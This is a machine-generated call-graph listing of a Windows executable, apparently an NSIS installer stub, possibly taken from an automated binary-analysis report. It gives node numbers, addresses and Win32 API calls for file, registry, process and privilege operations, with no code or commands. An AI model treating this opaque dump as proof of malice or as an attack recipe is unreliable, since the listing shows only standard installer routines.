3917->3918 3919 404766 3920 404792 3919->3920 3921 4047a3 3919->3921 3980 405951 GetDlgItemTextA 3920->3980 3923 4047af GetDlgItem 3921->3923 3926 40480e 3921->3926 3925 4047c3 3923->3925 3924 40479d 3928 406535 5 API calls 3924->3928 3930 4047d7 SetWindowTextA 3925->3930 3935 405c82 4 API calls 3925->3935 3927 4048f2 3926->3927 3931 4062ea 17 API calls 3926->3931 3978 404a9c 3926->3978 3927->3978 3982 405951 GetDlgItemTextA 3927->3982 3928->3921 3933 4042d4 18 API calls 3930->3933 3936 404882 SHBrowseForFolderA 3931->3936 3932 404922 3937 405cd7 18 API calls 3932->3937 3938 4047f3 3933->3938 3934 40433b 8 API calls 3939 404ab0 3934->3939 3940 4047cd 3935->3940 3936->3927 3941 40489a CoTaskMemFree 3936->3941 3942 404928 3937->3942 3943 4042d4 18 API calls 3938->3943 3940->3930 3944 405be9 3 API calls 3940->3944 3945 405be9 3 API calls 3941->3945 3983 406257 lstrcpynA 3942->3983 3946 404801 3943->3946 3944->3930 3949 4048a7 3945->3949 3981 404309 SendMessageA 3946->3981 3950 4048de SetDlgItemTextA 3949->3950 3955 4062ea 17 API calls 3949->3955 3950->3927 3951 404807 3953 406663 5 API calls 3951->3953 3952 40493f 3954 406663 5 API calls 3952->3954 3953->3926 3962 404946 3954->3962 3956 4048c6 lstrcmpiA 3955->3956 3956->3950 3959 4048d7 lstrcatA 3956->3959 3957 404982 3984 406257 lstrcpynA 3957->3984 3959->3950 3960 404989 3961 405c82 4 API calls 3960->3961 3963 40498f GetDiskFreeSpaceA 3961->3963 3962->3957 3965 405c30 2 API calls 3962->3965 3967 4049da 3962->3967 3966 4049b3 MulDiv 3963->3966 3963->3967 3965->3962 3966->3967 3968 404a4b 3967->3968 3969 404be2 20 API calls 3967->3969 3970 404a6e 3968->3970 3972 40140b 2 API calls 3968->3972 3971 404a38 3969->3971 3985 4042f6 KiUserCallbackDispatcher 3970->3985 3974 404a4d SetDlgItemTextA 3971->3974 3975 404a3d 3971->3975 3972->3970 3974->3968 3977 404b1d 20 API calls 3975->3977 3976 404a8a 3976->3978 3986 4046bf 3976->3986 3977->3968 3978->3934 3980->3924 3981->3951 3982->3932 3983->3952 3984->3960 3985->3976 3987 4046d2 SendMessageA 3986->3987 3988 4046cd 3986->3988 3987->3978 3988->3987 3989 402766 3990 40276c 3989->3990 3991 402774 FindClose 3990->3991 3992 402ac5 3990->3992 3991->3992 3993 4023e8 3994 402c39 17 API calls 3993->3994 3995 4023f9 3994->3995 3996 402c39 17 API calls 3995->3996 3997 402402 3996->3997 3998 402c39 17 API calls 3997->3998 3999 40240c GetPrivateProfileStringA 3998->3999 4000 4027e8 4001 402c39 17 API calls 4000->4001 4002 4027f4 4001->4002 4003 40280a 4002->4003 4005 402c39 17 API calls 4002->4005 4004 405dc5 2 API calls 4003->4004 4006 402810 4004->4006 4005->4003 4028 405dea GetFileAttributesA CreateFileA 4006->4028 4008 40281d 4009 4028d9 4008->4009 4010 4028c1 4008->4010 4011 402838 GlobalAlloc 4008->4011 4012 4028e0 DeleteFileA 4009->4012 4013 4028f3 4009->4013 4015 403143 31 API calls 4010->4015 4011->4010 4014 402851 4011->4014 4012->4013 4029 40336b SetFilePointer 4014->4029 4017 4028ce CloseHandle 4015->4017 4017->4009 4018 402857 4019 403355 ReadFile 4018->4019 4020 402860 GlobalAlloc 4019->4020 4021 402870 4020->4021 4022 4028aa 4020->4022 4024 403143 31 API calls 4021->4024 4023 405e91 WriteFile 4022->4023 4025 4028b6 GlobalFree 4023->4025 4027 40287d 4024->4027 4025->4010 4026 4028a1 GlobalFree 4026->4022 4027->4026 4028->4008 4029->4018 3017 40166a 3018 402c39 17 API calls 3017->3018 3019 401671 3018->3019 3020 402c39 17 API calls 3019->3020 3021 40167a 3020->3021 3022 402c39 17 API calls 3021->3022 3023 401683 MoveFileA 3022->3023 3024 401696 3023->3024 3025 40168f 3023->3025 3029 4022ea 3024->3029 3031 4065ce FindFirstFileA 3024->3031 3026 401423 24 API calls 3025->3026 3026->3029 3032 4065e4 FindClose 3031->3032 3033 4016a5 3031->3033 3032->3033 3033->3029 3034 406030 MoveFileExA 3033->3034 3035 406044 3034->3035 3037 406051 3034->3037 3038 405ec0 3035->3038 3037->3025 3039 405ee6 3038->3039 3040 405f0c GetShortPathNameA 3038->3040 3065 405dea GetFileAttributesA CreateFileA 3039->3065 3042 405f21 3040->3042 3043 40602b 3040->3043 3042->3043 3045 405f29 wsprintfA 3042->3045 3043->3037 3044 405ef0 CloseHandle GetShortPathNameA 3044->3043 3046 405f04 3044->3046 3047 4062ea 17 API calls 3045->3047 3046->3040 3046->3043 3048 405f51 3047->3048 3066 405dea GetFileAttributesA CreateFileA 3048->3066 3050 405f5e 3050->3043 3051 405f6d GetFileSize GlobalAlloc 3050->3051 3052 406024 CloseHandle 3051->3052 3053 405f8f 3051->3053 3052->3043 3067 405e62 ReadFile 3053->3067 3058 405fc2 3060 405d4f 4 API calls 3058->3060 3059 405fae lstrcpyA 3061 405fd0 3059->3061 3060->3061 3062 406007 SetFilePointer 3061->3062 3074 405e91 WriteFile 3062->3074 3065->3044 3066->3050 3068 405e80 3067->3068 3068->3052 3069 405d4f lstrlenA 3068->3069 3070 405d90 lstrlenA 3069->3070 3071 405d98 3070->3071 3072 405d69 lstrcmpiA 3070->3072 3071->3058 3071->3059 3072->3071 3073 405d87 CharNextA 3072->3073 3073->3070 3075 405eaf GlobalFree 3074->3075 3075->3052 4030 4052ec 4031 405310 4030->4031 4032 4052fc 4030->4032 4035 405318 IsWindowVisible 4031->4035 4041 40532f 4031->4041 4033 405302 4032->4033 4034 405359 4032->4034 4037 404320 SendMessageA 4033->4037 4036 40535e CallWindowProcA 4034->4036 4035->4034 4038 405325 4035->4038 4039 40530c 4036->4039 4037->4039 4040 404c27 5 API calls 4038->4040 4040->4041 4041->4036 4042 404ca7 4 API calls 4041->4042 4042->4034 4043 4019ed 4044 402c39 17 API calls 4043->4044 4045 4019f4 4044->4045 4046 402c39 17 API calls 4045->4046 4047 4019fd 4046->4047 4048 401a04 lstrcmpiA 4047->4048 4049 401a16 lstrcmpA 4047->4049 4050 401a0a 4048->4050 4049->4050 4051 40156f 4052 401586 4051->4052 4053 40157f ShowWindow 4051->4053 4054 401594 ShowWindow 4052->4054 4055 402ac5 4052->4055 4053->4052 4054->4055 3176 402173 3177 402c39 17 API calls 3176->3177 3178 40217a 3177->3178 3179 402c39 17 API calls 3178->3179 3180 402184 3179->3180 3181 402c39 17 API calls 3180->3181 3182 40218e 3181->3182 3183 402c39 17 API calls 3182->3183 3184 40219b 3183->3184 3185 402c39 17 API calls 3184->3185 3186 4021a5 3185->3186 3187 4021e7 CoCreateInstance 3186->3187 3188 402c39 17 API calls 3186->3188 3191 402206 3187->3191 3193 4022b4 3187->3193 3188->3187 3189 401423 24 API calls 3190 4022ea 3189->3190 3192 402294 MultiByteToWideChar 3191->3192 3191->3193 3192->3193 3193->3189 3193->3190 4056 4022f3 4057 402c39 17 API calls 4056->4057 4058 4022f9 4057->4058 4059 402c39 17 API calls 4058->4059 4060 402302 4059->4060 4061 402c39 17 API calls 4060->4061 4062 40230b 4061->4062 4063 4065ce 2 API calls 4062->4063 4064 402314 4063->4064 4065 402325 lstrlenA lstrlenA 4064->4065 4066 402318 4064->4066 4067 405378 24 API calls 4065->4067 4068 405378 24 API calls 4066->4068 4070 402320 4066->4070 4069 402361 SHFileOperationA 4067->4069 4068->4070 4069->4066 4069->4070 4071 4014f4 SetForegroundWindow 4072 402ac5 4071->4072 3500 402675 3501 402c17 17 API calls 3500->3501 3505 40267f 3501->3505 3502 4026ed 3503 405e62 ReadFile 3503->3505 3504 4026ef 3509 4061b5 wsprintfA 3504->3509 3505->3502 3505->3503 3505->3504 3506 4026ff 3505->3506 3506->3502 3508 402715 SetFilePointer 3506->3508 3508->3502 3509->3502 4073 4029f6 4074 402a49 4073->4074 4075 4029fd 4073->4075 4076 406663 5 API calls 4074->4076 4078 402c17 17 API calls 4075->4078 4083 402a47 4075->4083 4077 402a50 4076->4077 4080 402c39 17 API calls 4077->4080 4079 402a0b 4078->4079 4081 402c17 17 API calls 4079->4081 4082 402a59 4080->4082 4085 402a1a 4081->4085 4082->4083 4091 4062aa 4082->4091 4090 4061b5 wsprintfA 4085->4090 4086 402a67 4086->4083 4095 406294 4086->4095 4090->4083 4092 4062b5 4091->4092 4093 4062d8 IIDFromString 4092->4093 4094 4062d1 4092->4094 4093->4086 4094->4086 4098 406279 WideCharToMultiByte 4095->4098 4097 402a88 CoTaskMemFree 4097->4083 4098->4097 4099 401ef9 4100 402c39 17 API calls 4099->4100 4101 401eff 4100->4101 4102 402c39 17 API calls 4101->4102 4103 401f08 4102->4103 4104 402c39 17 API calls 4103->4104 4105 401f11 4104->4105 4106 402c39 17 API calls 4105->4106 4107 401f1a 4106->4107 4108 401423 24 API calls 4107->4108 4109 401f21 4108->4109 4116 405933 ShellExecuteExA 4109->4116 4111 401f5c 4113 4027c8 4111->4113 4117 4066d8 WaitForSingleObject 4111->4117 4114 401f76 CloseHandle 4114->4113 4116->4111 4118 4066f2 4117->4118 4119 406704 GetExitCodeProcess 4118->4119 4120 40669f 2 API calls 4118->4120 4119->4114 4121 4066f9 WaitForSingleObject 4120->4121 4121->4118 4122 401f7b 4123 402c39 17 API calls 4122->4123 4124 401f81 4123->4124 4125 405378 24 API calls 4124->4125 4126 401f8b 4125->4126 4127 4058f0 2 API calls 4126->4127 4128 401f91 4127->4128 4129 4066d8 5 API calls 4128->4129 4132 4027c8 4128->4132 4134 401fb2 CloseHandle 4128->4134 4131 401fa6 4129->4131 4131->4134 4135 4061b5 wsprintfA 4131->4135 4134->4132 4135->4134 4136 401ffb 4137 402c39 17 API calls 4136->4137 4138 402002 4137->4138 4139 406663 5 API calls 4138->4139 4140 402011 4139->4140 4141 402029 GlobalAlloc 4140->4141 4142 402099 4140->4142 4141->4142 4143 40203d 4141->4143 4144 406663 5 API calls 4143->4144 4145 402044 4144->4145 4146 406663 5 API calls 4145->4146 4147 40204e 4146->4147 4147->4142 4151 4061b5 wsprintfA 4147->4151 4149 402089 4152 4061b5 wsprintfA 4149->4152 4151->4149 4152->4142 4153 4039fb 4154 403a06 4153->4154 4155 403a0a 4154->4155 4156 403a0d GlobalAlloc 4154->4156 4156->4155 4157 4018fd 4158 401934 4157->4158 4159 402c39 17 API calls 4158->4159 4160 401939 4159->4160 4161 405a19 67 API calls 4160->4161 4162 401942 4161->4162 3736 40247e 3737 402c39 17 API calls 3736->3737 3738 402490 3737->3738 3739 402c39 17 API calls 3738->3739 3740 40249a 3739->3740 3753 402cc9 3740->3753 3743 402ac5 3744 4024cf 3745 4024db 3744->3745 3748 402c17 17 API calls 3744->3748 3749 4024fd RegSetValueExA 3745->3749 3750 403143 31 API calls 3745->3750 3746 402c39 17 API calls 3747 4024c8 lstrlenA 3746->3747 3747->3744 3748->3745 3751 402513 RegCloseKey 3749->3751 3750->3749 3751->3743 3754 402ce4 3753->3754 3757 40610b 3754->3757 3758 40611a 3757->3758 3759 4024aa 3758->3759 3760 406125 RegCreateKeyExA 3758->3760 3759->3743 3759->3744 3759->3746 3760->3759 4163 401cfe 4164 402c17 17 API calls 4163->4164 4165 401d04 IsWindow 4164->4165 4166 401a0e 4165->4166 4167 401000 4168 401037 BeginPaint GetClientRect 4167->4168 4169 40100c DefWindowProcA 4167->4169 4171 4010f3 4168->4171 4172 401179 4169->4172 4173 401073 CreateBrushIndirect FillRect DeleteObject 4171->4173 4174 4010fc 4171->4174 4173->4171 4175 401102 CreateFontIndirectA 4174->4175 4176 401167 EndPaint 4174->4176 4175->4176 4177 401112 6 API calls 4175->4177 4176->4172 4177->4176 4178 401900 4179 402c39 17 API calls 4178->4179 4180 401907 4179->4180 4181 40596d MessageBoxIndirectA 4180->4181 4182 401910 4181->4182 4183 402780 4184 402786 4183->4184 4185 40278a FindNextFileA 4184->4185 4186 40279c 4184->4186 4185->4186 4187 4027db 4185->4187 4189 406257 lstrcpynA 4187->4189 4189->4186 4190 401502 4191 40150a 4190->4191 4193 40151d 4190->4193 4192 402c17 17 API calls 4191->4192 4192->4193 4194 40440a lstrcpynA lstrlenA 4195 40298a 4196 402c17 17 API calls 4195->4196 4197 402990 4196->4197 4198 4062ea 17 API calls 4197->4198 4199 4027c8 4197->4199 4198->4199 4200 40260c 4201 402c39 17 API calls 4200->4201 4202 402613 4201->4202 4205 405dea GetFileAttributesA CreateFileA 4202->4205 4204 40261f 4205->4204 3076 402590 3077 402c79 17 API calls 3076->3077 3078 40259a 3077->3078 3079 402c17 17 API calls 3078->3079 3080 4025a3 3079->3080 3081 4025b1 3080->3081 3082 4027c8 3080->3082 3083 4025ca RegEnumValueA 3081->3083 3084 4025be RegEnumKeyA 3081->3084 3085 4025df 3083->3085 3086 4025e6 RegCloseKey 3083->3086 3084->3086 3085->3086 3086->3082 4206 401490 4207 405378 24 API calls 4206->4207 4208 401497 4207->4208 3702 40239b 3703 4023b2 3702->3703 3704 4023ac 3702->3704 3706 4023c2 3703->3706 3707 402c39 17 API calls 3703->3707 3705 402c39 17 API calls 3704->3705 3705->3703 3708 4023d0 3706->3708 3709 402c39 17 API calls 3706->3709 3707->3706 3710 402c39 17 API calls 3708->3710 3709->3708 3711 4023d9 WritePrivateProfileStringA 3710->3711 3732 40159d 3733 402c39 17 API calls 3732->3733 3734 4015a4 SetFileAttributesA 3733->3734 3735 4015b6 3734->3735 4209 40149d 4210 4014ab PostQuitMessage 4209->4210 4211 40238f 4209->4211 4210->4211 3761 40251e 3762 402c79 17 API calls 3761->3762 3763 402528 3762->3763 3764 402c39 17 API calls 3763->3764 3765 402531 3764->3765 3766 40253b RegQueryValueExA 3765->3766 3769 4027c8 3765->3769 3767 402561 RegCloseKey 3766->3767 3768 40255b 3766->3768 3767->3769 3768->3767 3772 4061b5 wsprintfA 3768->3772 3772->3767 4212 401a1e 4213 402c39 17 API calls 4212->4213 4214 401a27 ExpandEnvironmentStringsA 4213->4214 4215 401a3b 4214->4215 4217 401a4e 4214->4217 4216 401a40 lstrcmpA 4215->4216 4215->4217 4216->4217 3773 40171f 3774 402c39 17 API calls 3773->3774 3775 401726 SearchPathA 3774->3775 3776 401741 3775->3776 4223 40471f 4224 404755 4223->4224 4225 40472f 4223->4225 4226 40433b 8 API calls 4224->4226 4227 4042d4 18 API calls 4225->4227 4228 404761 4226->4228 4229 40473c SetDlgItemTextA 4227->4229 4229->4224 4230 401c1f 4231 402c17 17 API calls 4230->4231 4232 401c35 4231->4232 4233 402c17 17 API calls 4232->4233 4234 401c42 4233->4234 4235 402c39 17 API calls 4234->4235 4237 401c57 4234->4237 4235->4237 4236 401c67 4239 401c72 4236->4239 4240 401cbe 4236->4240 4237->4236 4238 402c39 17 API calls 4237->4238 4238->4236 4241 402c17 17 API calls 4239->4241 4242 402c39 17 API calls 4240->4242 4243 401c77 4241->4243 4244 401cc3 4242->4244 4245 402c17 17 API calls 4243->4245 4246 402c39 17 API calls 4244->4246 4247 401c83 4245->4247 4248 401ccc FindWindowExA 4246->4248 4249 401c90 SendMessageTimeoutA 4247->4249 4250 401cae SendMessageA 4247->4250 4251 401cea 4248->4251 4249->4251 4250->4251 4252 401d1f 4253 402c17 17 API calls 4252->4253 4254 401d26 4253->4254 4255 402c17 17 API calls 4254->4255 4256 401d32 GetDlgItem 4255->4256 4257 402628 4256->4257 4258 402aa0 SendMessageA 4259 402ac5 4258->4259 4260 402aba InvalidateRect 4258->4260 4260->4259 2924 4020a5 2925 4020b7 2924->2925 2935 402165 2924->2935 2942 402c39 2925->2942 2928 401423 24 API calls 2931 4022ea 2928->2931 2929 402c39 17 API calls 2930 4020c7 2929->2930 2932 4020dc LoadLibraryExA 2930->2932 2933 4020cf GetModuleHandleA 2930->2933 2934 4020ec GetProcAddress 2932->2934 2932->2935 2933->2932 2933->2934 2936 402138 2934->2936 2937 4020fb 2934->2937 2935->2928 2951 405378 2936->2951 2940 40210b 2937->2940 2948 401423 2937->2948 2940->2931 2941 402159 FreeLibrary 2940->2941 2941->2931 2943 402c45 2942->2943 2944 4062ea 17 API calls 2943->2944 2945 402c66 2944->2945 2946 4020be 2945->2946 2947 406535 5 API calls 2945->2947 2946->2929 2947->2946 2949 405378 24 API calls 2948->2949 2950 401431 2949->2950 2950->2940 2952 405393 2951->2952 2961 405436 2951->2961 2953 4053b0 lstrlenA 2952->2953 2954 4062ea 17 API calls 2952->2954 2955 4053d9 2953->2955 2956 4053be lstrlenA 2953->2956 2954->2953 2958 4053ec 2955->2958 2959 4053df SetWindowTextA 2955->2959 2957 4053d0 lstrcatA 2956->2957 2956->2961 2957->2955 2960 4053f2 SendMessageA SendMessageA SendMessageA 2958->2960 2958->2961 2959->2958 2960->2961 2961->2940 4261 402e25 4262 402e34 SetTimer 4261->4262 4263 402e4d 4261->4263 4262->4263 4264 402ea2 4263->4264 4265 402e67 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4263->4265 4265->4264 2972 402429 2973 402430 2972->2973 2974 40245b 2972->2974 2988 402c79 2973->2988 2976 402c39 17 API calls 2974->2976 2977 402462 2976->2977 2984 402cf7 2977->2984 2980 402441 2982 402c39 17 API calls 2980->2982 2981 40246f 2983 402448 RegDeleteValueA RegCloseKey 2982->2983 2983->2981 2985 402d0a 2984->2985 2986 402d03 2984->2986 2985->2986 2993 402d3b 2985->2993 2986->2981 2989 402c39 17 API calls 2988->2989 2990 402c90 2989->2990 2991 4060dd RegOpenKeyExA 2990->2991 2992 402437 2991->2992 2992->2980 2992->2981 2994 4060dd RegOpenKeyExA 2993->2994 2995 402d69 2994->2995 2996 402d73 2995->2996 2997 402e1e 2995->2997 2998 402d79 RegEnumValueA 2996->2998 3003 402d9c 2996->3003 2997->2986 2999 402e03 RegCloseKey 2998->2999 2998->3003 2999->2997 3000 402dd8 RegEnumKeyA 3001 402de1 RegCloseKey 3000->3001 3000->3003 3008 406663 GetModuleHandleA 3001->3008 3003->2999 3003->3000 3003->3001 3005 402d3b 6 API calls 3003->3005 3005->3003 3006 402e13 3006->2997 3007 402df5 RegDeleteKeyA 3007->2997 3009 406689 GetProcAddress 3008->3009 3010 40667f 3008->3010 3011 402df1 3009->3011 3014 4065f5 GetSystemDirectoryA 3010->3014 3011->3006 3011->3007 3013 406685 3013->3009 3013->3011 3015 406617 wsprintfA LoadLibraryExA 3014->3015 3015->3013 4266 4027aa 4267 402c39 17 API calls 4266->4267 4268 4027b1 FindFirstFileA 4267->4268 4269 4027d4 4268->4269 4273 4027c4 4268->4273 4270 4027db 4269->4270 4274 4061b5 wsprintfA 4269->4274 4275 406257 lstrcpynA 4270->4275 4274->4270 4275->4273 4276 40262e 4277 402633 4276->4277 4278 402647 4276->4278 4279 402c17 17 API calls 4277->4279 4280 402c39 17 API calls 4278->4280 4282 40263c 4279->4282 4281 40264e lstrlenA 4280->4281 4281->4282 4283 402670 4282->4283 4284 405e91 WriteFile 4282->4284 4284->4283 3088 401932 3089 401934 3088->3089 3090 402c39 17 API calls 3089->3090 3091 401939 3090->3091 3094 405a19 3091->3094 3135 405cd7 3094->3135 3097 405a41 DeleteFileA 3099 401942 3097->3099 3098 405a58 3101 405b90 3098->3101 3149 406257 lstrcpynA 3098->3149 3101->3099 3107 4065ce 2 API calls 3101->3107 3102 405a7e 3103 405a91 3102->3103 3104 405a84 lstrcatA 3102->3104 3150 405c30 lstrlenA 3103->3150 3105 405a97 3104->3105 3108 405aa5 lstrcatA 3105->3108 3109 405a9c 3105->3109 3110 405baa 3107->3110 3112 405ab0 lstrlenA FindFirstFileA 3108->3112 3109->3108 3109->3112 3110->3099 3111 405bae 3110->3111 3163 405be9 lstrlenA CharPrevA 3111->3163 3114 405b86 3112->3114 3126 405ad4 3112->3126 3114->3101 3116 405c14 CharNextA 3116->3126 3117 4059d1 5 API calls 3118 405bc0 3117->3118 3119 405bc4 3118->3119 3120 405bda 3118->3120 3119->3099 3125 405378 24 API calls 3119->3125 3123 405378 24 API calls 3120->3123 3121 405b65 FindNextFileA 3124 405b7d FindClose 3121->3124 3121->3126 3123->3099 3124->3114 3127 405bd1 3125->3127 3126->3116 3126->3121 3130 405a19 60 API calls 3126->3130 3132 405378 24 API calls 3126->3132 3133 405378 24 API calls 3126->3133 3134 406030 36 API calls 3126->3134 3154 406257 lstrcpynA 3126->3154 3155 4059d1 3126->3155 3128 406030 36 API calls 3127->3128 3131 405bd8 3128->3131 3130->3126 3131->3099 3132->3121 3133->3126 3134->3126 3166 406257 lstrcpynA 3135->3166 3137 405ce8 3167 405c82 CharNextA CharNextA 3137->3167 3140 405a39 3140->3097 3140->3098 3141 406535 5 API calls 3144 405cfe 3141->3144 3142 405d29 lstrlenA 3143 405d34 3142->3143 3142->3144 3146 405be9 3 API calls 3143->3146 3144->3140 3144->3142 3145 4065ce 2 API calls 3144->3145 3148 405c30 2 API calls 3144->3148 3145->3144 3147 405d39 GetFileAttributesA 3146->3147 3147->3140 3148->3142 3149->3102 3151 405c3d 3150->3151 3152 405c42 CharPrevA 3151->3152 3153 405c4e 3151->3153 3152->3151 3152->3153 3153->3105 3154->3126 3173 405dc5 GetFileAttributesA 3155->3173 3158 4059fe 3158->3126 3159 4059f4 DeleteFileA 3161 4059fa 3159->3161 3160 4059ec RemoveDirectoryA 3160->3161 3161->3158 3162 405a0a SetFileAttributesA 3161->3162 3162->3158 3164 405c03 lstrcatA 3163->3164 3165 405bb4 3163->3165 3164->3165 3165->3117 3166->3137 3168 405c9d 3167->3168 3171 405cad 3167->3171 3170 405ca8 CharNextA 3168->3170 3168->3171 3169 405ccd 3169->3140 3169->3141 3170->3169 3171->3169 3172 405c14 CharNextA 3171->3172 3172->3171 3174 4059dd 3173->3174 3175 405dd7 SetFileAttributesA 3173->3175 3174->3158 3174->3159 3174->3160 3175->3174 3194 4033b3 SetErrorMode GetVersionExA 3195 403444 3194->3195 3196 403405 GetVersionExA 3194->3196 3198 4034c8 3195->3198 3199 406663 5 API calls 3195->3199 3196->3195 3197 403421 3196->3197 3197->3195 3200 4065f5 3 API calls 3198->3200 3199->3198 3201 4034de lstrlenA 3200->3201 3201->3198 3202 4034ee 3201->3202 3203 406663 5 API calls 3202->3203 3204 4034f5 3203->3204 3205 406663 5 API calls 3204->3205 3206 4034fc 3205->3206 3207 406663 5 API calls 3206->3207 3208 403508 #17 OleInitialize SHGetFileInfoA 3207->3208 3286 406257 lstrcpynA 3208->3286 3211 403556 GetCommandLineA 3287 406257 lstrcpynA 3211->3287 3213 403568 3214 405c14 CharNextA 3213->3214 3215 40358f CharNextA 3214->3215 3224 40359e 3215->3224 3216 403664 3217 403678 GetTempPathA 3216->3217 3288 403382 3217->3288 3219 403690 3221 403694 GetWindowsDirectoryA lstrcatA 3219->3221 3222 4036ea DeleteFileA 3219->3222 3220 405c14 CharNextA 3220->3224 3225 403382 12 API calls 3221->3225 3298 402f0c GetTickCount GetModuleFileNameA 3222->3298 3224->3216 3224->3220 3226 403666 3224->3226 3228 4036b0 3225->3228 3382 406257 lstrcpynA 3226->3382 3227 4036fd 3231 403782 3227->3231 3236 405c14 CharNextA 3227->3236 3282 403792 3227->3282 3228->3222 3230 4036b4 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3228->3230 3233 403382 12 API calls 3230->3233 3326 403a3d 3231->3326 3234 4036e2 3233->3234 3234->3222 3234->3282 3238 403717 3236->3238 3247 4037c1 3238->3247 3248 40375c 3238->3248 3239 4037ac 3392 40596d 3239->3392 3240 4038cf 3242 4038d7 GetCurrentProcess OpenProcessToken 3240->3242 3243 40394d ExitProcess 3240->3243 3244 40391d 3242->3244 3245 4038ee LookupPrivilegeValueA AdjustTokenPrivileges 3242->3245 3250 406663 5 API calls 3244->3250 3245->3244 3396 4058d8 3247->3396 3251 405cd7 18 API calls 3248->3251 3253 403924 3250->3253 3254 403768 3251->3254 3258 403939 ExitWindowsEx 3253->3258 3261 403946 3253->3261 3254->3282 3383 406257 lstrcpynA 3254->3383 3256 4037e2 lstrcatA lstrcmpiA 3260 4037fe 3256->3260 3256->3282 3257 4037d7 lstrcatA 3257->3256 3258->3243 3258->3261 3263 403803 3260->3263 3264 40380a 3260->3264 3412 40140b 3261->3412 3262 403777 3384 406257 lstrcpynA 3262->3384 3399 40583e CreateDirectoryA 3263->3399 3404 4058bb CreateDirectoryA 3264->3404 3270 40380f SetCurrentDirectoryA 3271 40382a 3270->3271 3272 40381f 3270->3272 3408 406257 lstrcpynA 3271->3408 3407 406257 lstrcpynA 3272->3407 3275 4062ea 17 API calls 3276 40386c DeleteFileA 3275->3276 3277 40387a CopyFileA 3276->3277 3278 403837 3276->3278 3277->3278 3278->3275 3279 4038c3 3278->3279 3280 406030 36 API calls 3278->3280 3283 4062ea 17 API calls 3278->3283 3285 4038ae CloseHandle 3278->3285 3409 4058f0 CreateProcessA 3278->3409 3281 406030 36 API calls 3279->3281 3280->3278 3281->3282 3385 403963 3282->3385 3283->3278 3285->3278 3286->3211 3287->3213 3289 406535 5 API calls 3288->3289 3291 40338e 3289->3291 3290 403398 3290->3219 3291->3290 3292 405be9 3 API calls 3291->3292 3293 4033a0 3292->3293 3294 4058bb 2 API calls 3293->3294 3295 4033a6 3294->3295 3296 405e19 2 API calls 3295->3296 3297 4033b1 3296->3297 3297->3219 3415 405dea GetFileAttributesA CreateFileA 3298->3415 3300 402f4c 3318 402f5c 3300->3318 3416 406257 lstrcpynA 3300->3416 3302 402f72 3303 405c30 2 API calls 3302->3303 3304 402f78 3303->3304 3417 406257 lstrcpynA 3304->3417 3306 402f83 GetFileSize 3307 40307d 3306->3307 3325 402f9a 3306->3325 3418 402ea8 3307->3418 3309 403086 3311 4030b6 GlobalAlloc 3309->3311 3309->3318 3453 40336b SetFilePointer 3309->3453 3429 40336b SetFilePointer 3311->3429 3313 4030e9 3315 402ea8 6 API calls 3313->3315 3315->3318 3316 40309f 3319 403355 ReadFile 3316->3319 3317 4030d1 3430 403143 3317->3430 3318->3227 3321 4030aa 3319->3321 3321->3311 3321->3318 3322 402ea8 6 API calls 3322->3325 3323 4030dd 3323->3318 3323->3323 3324 40311a SetFilePointer 3323->3324 3324->3318 3325->3307 3325->3313 3325->3318 3325->3322 3450 403355 3325->3450 3327 406663 5 API calls 3326->3327 3328 403a51 3327->3328 3329 403a57 3328->3329 3330 403a69 3328->3330 3474 4061b5 wsprintfA 3329->3474 3331 40613e 3 API calls 3330->3331 3332 403a94 3331->3332 3334 403ab2 lstrcatA 3332->3334 3336 40613e 3 API calls 3332->3336 3335 403a67 3334->3335 3459 403d02 3335->3459 3336->3334 3339 405cd7 18 API calls 3340 403ae4 3339->3340 3341 403b6d 3340->3341 3343 40613e 3 API calls 3340->3343 3342 405cd7 18 API calls 3341->3342 3344 403b73 3342->3344 3345 403b10 3343->3345 3346 403b83 LoadImageA 3344->3346 3347 4062ea 17 API calls 3344->3347 3345->3341 3350 403b2c lstrlenA 3345->3350 3353 405c14 CharNextA 3345->3353 3348 403c29 3346->3348 3349 403baa RegisterClassA 3346->3349 3347->3346 3352 40140b 2 API calls 3348->3352 3351 403be0 SystemParametersInfoA CreateWindowExA 3349->3351 3381 403c33 3349->3381 3354 403b60 3350->3354 3355 403b3a lstrcmpiA 3350->3355 3351->3348 3356 403c2f 3352->3356 3358 403b2a 3353->3358 3357 405be9 3 API calls 3354->3357 3355->3354 3359 403b4a GetFileAttributesA 3355->3359 3360 403d02 18 API calls 3356->3360 3356->3381 3361 403b66 3357->3361 3358->3350 3362 403b56 3359->3362 3363 403c40 3360->3363 3475 406257 lstrcpynA 3361->3475 3362->3354 3365 405c30 2 API calls 3362->3365 3366 403c4c ShowWindow 3363->3366 3367 403ccf 3363->3367 3365->3354 3369 4065f5 3 API calls 3366->3369 3467 40544a OleInitialize 3367->3467 3371 403c64 3369->3371 3370 403cd5 3372 403cf1 3370->3372 3373 403cd9 3370->3373 3374 403c72 GetClassInfoA 3371->3374 3376 4065f5 3 API calls 3371->3376 3375 40140b 2 API calls 3372->3375 3379 40140b 2 API calls 3373->3379 3373->3381 3377 403c86 GetClassInfoA RegisterClassA 3374->3377 3378 403c9c DialogBoxParamA 3374->3378 3375->3381 3376->3374 3377->3378 3380 40140b 2 API calls 3378->3380 3379->3381 3380->3381 3381->3282 3382->3217 3383->3262 3384->3231 3386 40397b 3385->3386 3387 40396d CloseHandle 3385->3387 3487 4039a8 3386->3487 3387->3386 3390 405a19 67 API calls 3391 40379a OleUninitialize 3390->3391 3391->3239 3391->3240 3393 405982 3392->3393 3394 4037b9 ExitProcess 3393->3394 3395 405996 MessageBoxIndirectA 3393->3395 3395->3394 3397 406663 5 API calls 3396->3397 3398 4037c6 lstrcatA 3397->3398 3398->3256 3398->3257 3400 403808 3399->3400 3401 40588f GetLastError 3399->3401 3400->3270 3401->3400 3402 40589e SetFileSecurityA 3401->3402 3402->3400 3403 4058b4 GetLastError 3402->3403 3403->3400 3405 4058cb 3404->3405 3406 4058cf GetLastError 3404->3406 3405->3270 3406->3405 3407->3271 3408->3278 3410 405923 CloseHandle 3409->3410 3411 40592f 3409->3411 3410->3411 3411->3278 3413 401389 2 API calls 3412->3413 3414 401420 3413->3414 3414->3243 3415->3300 3416->3302 3417->3306 3419 402eb1 3418->3419 3420 402ec9 3418->3420 3421 402ec1 3419->3421 3422 402eba DestroyWindow 3419->3422 3423 402ed1 3420->3423 3424 402ed9 GetTickCount 3420->3424 3421->3309 3422->3421 3454 40669f 3423->3454 3426 402ee7 CreateDialogParamA ShowWindow 3424->3426 3427 402f0a 3424->3427 3426->3427 3427->3309 3429->3317 3431 403159 3430->3431 3432 403187 3431->3432 